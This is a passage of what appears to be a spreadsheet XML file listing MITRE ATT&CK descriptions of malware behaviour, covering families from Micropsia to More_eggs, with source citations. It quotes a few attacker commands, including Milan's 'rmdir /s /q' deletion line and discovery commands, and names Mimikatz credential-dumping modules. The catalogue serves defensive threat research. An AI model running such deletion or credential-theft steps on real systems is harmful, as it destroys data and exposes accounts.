    <t>[Micropsia](https://attack.mitre.org/software/S0339) gathers the hostname and OS version from the victim’s machine.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) collects the username from the victim’s machine.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) uses HTTP and HTTPS for C2 network communications.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a command-line shell using cmd.exe.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use a COM component to generate scheduled tasks.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has the ability to use DNS for C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can upload files from a compromised host.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use hardcoded domains as an input for domain generation algorithms.(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has used an executable named `companycatalog.exe.config` to appear benign.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can delete files via `C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 &gt; Nul &amp; rmdir /s /q`.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has run `C:\Windows\system32\cmd.exe /c cmd /c dir c:\users\ /s 2&gt;&amp;1` to discover local accounts.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has saved files prior to upload from a compromised host to folders beginning with the characters `a9850d2f`.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has used an executable named `companycatalogue` to appear benign.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use the API `DnsQuery_A` for DNS resolution.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can encode files containing information about the targeted system.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use a custom protocol tunneled through DNS or HTTP.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can establish persistence on a targeted host with scheduled tasks.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can enumerate the targeted machine's name and GUID.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2&gt;&amp;1` to discover network settings.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can identify users registered to a targeted machine.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use HTTPS for communication with C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use `cmd.exe` for discovery actions on a targeted system.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) can dump process memory and extract clear-text credentials.(Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The &lt;code&gt;LSADUMP::ChangeNTLM&lt;/code&gt; and &lt;code&gt;LSADUMP::SetNTLM&lt;/code&gt; modules can also manipulate the password hash of an account without knowing the clear text value.(Citation: Adsecurity Mimikatz Guide)(Citation: Metcalf 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)(Citation: Cobalt Strike Manual 4.3 November 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)	</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create golden tickets.(Citation: GitHub Mimikatz kerberos Module)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;SEKURLSA::Pth&lt;/code&gt; module can impersonate a user, with only a password hash, to execute arbitrary commands.(Citation: Adsecurity Mimikatz Guide)(Citation: NCSC Joint Report Public Tools)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCSync&lt;/code&gt; and &lt;code&gt;KERBEROS::PTT&lt;/code&gt; modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)(Citation: Harmj0y DCSync Sept 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;CRYPTO::Extract&lt;/code&gt; module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCShadow&lt;/code&gt; module can be used to make AD updates by temporarily setting a computer to be a DC.(Citation: Deply Mimikatz)(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;MISC::AddSid&lt;/code&gt; module can appended any SID or user/group account to a user's SID-History. [Mimikatz](https://attack.mitre.org/software/S0002) also utilizes [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper contains an implementation of an SSP.(Citation: Deply Mimikatz)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create silver tickets.(Citation: GitHub Mimikatz kerberos Module)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s `CRYPTO` module can create and export various types of authentication certificates.(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) contains functionality to acquire credentials from the Windows Credential Manager.(Citation: Delpy Mimikatz Crendential Manager)</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.(Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use DGA to generate new Twitter URLs for C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.(Citation: Securelist MiniDuke Feb 2013)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can enumerate local drives.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can download additional encrypted backdoors onto the victim via GIF files.(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use control flow flattening to obscure code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can gather the hostname on a compromised machine.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is likely loaded via DLL hijacking into a legitimate McAfee binary.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has a function for decrypting data containing C2 configuration information.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can collect CPU and architecture information from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can gather the username from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has the capability to execute commands using cmd.exe.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has created registry keys for persistence, including `HKCU\Software\bkfouerioyou`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{6afa8072-b2b1-31a8-b5c1-{Unique Identifier}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3BF41072-B2B1-31A8-B5C1-{Unique Identifier}`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has collected files and data from a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has transmitted collected files and data to its C2 server.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has downloaded additional malware and files onto a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c net user {Username}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a temporary user on the system named `Lost_{Unique Identifier}`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has temporarily stored collected information to the files `“%AppData%\{Unique Identifier}\HOSTRURKLSR”` and `“%AppData%\{Unique Identifier}\NEWERSSEMP”`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has used Windows API calls, including `NetUserAdd` and `NetUserDel`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has been injected directly into a running process, including `explorer.exe`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [Mis-Type](https://attack.mitre.org/software/S0084) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c ipconfig /all&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over HTTP.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has used `cmd.exe` to run commands on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">[Misdat](https://attack.mitre.org/software/S0083) has created registry keys for persistence, including `HKCU\Software\dnimtsoleht\StubPath`, `HKCU\Software\snimtsOleht\StubPath`, `HKCU\Software\Backtsaleht\StubPath`, `HKLM\SOFTWARE\Microsoft\Active Setup\Installed. Components\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting Registry keys used for persistence.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) has collected files and data from a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) has uploaded files and data to its C2 servers.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting the backdoor file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of downloading files from the C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t xml:space="preserve">[Misdat](https://attack.mitre.org/software/S0083) has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic communicates over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) was typically packed using UPX.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic is Base64-encoded plaintext.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [Misdat](https://attack.mitre.org/software/S0083) contains the operating system version of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>Many [Misdat](https://attack.mitre.org/software/S0083) samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of providing shell functionality to the attacker to execute commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to download and execute .exe files.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) creates the following Registry entry: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia&lt;/code&gt;.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to gather NTLM password information.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to open a remote shell and run basic commands.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim browser bookmarks.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data collected from the victim mobile device.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to download a file from the C2 server to the victim mobile device's SD card.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload information about all running processes to its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can download additional payloads from the C2.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can use PowerShell to set persistence.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can achieve persitence on the infected machine by setting the Registry run key.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can use WMI commands to check the system for firewall and antivirus software.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can collect information about the about the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can execute commands via the command line utility.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can perform WMI commands on the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has the ability to upload files from victim's machines.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has the ability to decrypt its payload prior to execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can inject a DLL into `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can upload files and information from a compromised host to its C2 server.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can download files to targeted systems.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has relied on a user opening a malicious document for execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can identify removable media attached to compromised hosts.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can establish persistence with the auto start function including using the value `EverNoteTrayUService`.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can use `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has been packed with Themida.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can use Base64 to encode information sent to its C2.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has the ability to RC4 encrypt C2 communications.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can use HTTP for C2 communication.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can delete itself or specified files.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a directory listing for a specified directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a keylogger.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) saves information from its keylogging routine as a .zip file in the present working directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) completes network communication via raw sockets.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the number of removable drives from the victim.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a list of running processes.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) encrypts C2 traffic using RC4 with a static key.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim IP address.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim username.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim's current time.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can execute commands via an interactive command shell.(Citation: Palo Alto MoonWind March 2017) [MoonWind](https://attack.mitre.org/software/S0149) uses batch scripts for various purposes, including to restart and uninstall itself.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) will decode malware components that are then dropped to the system.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can remove itself from a system.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can download and launch additional payloads.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used HTTP GET requests to check internet connectivity.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284)'s payload has been encrypted with a key that has the hostname and processor family information appended to the end.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used regsvr32.exe to execute the malicious DLL.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can obtain information on installed anti-malware programs.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used basE91 encoding, along with encryption, for C2 communication.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used an RC4-based encryption method for its C2 communications.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the OS version and computer name.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the IP address from the victim's machine.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
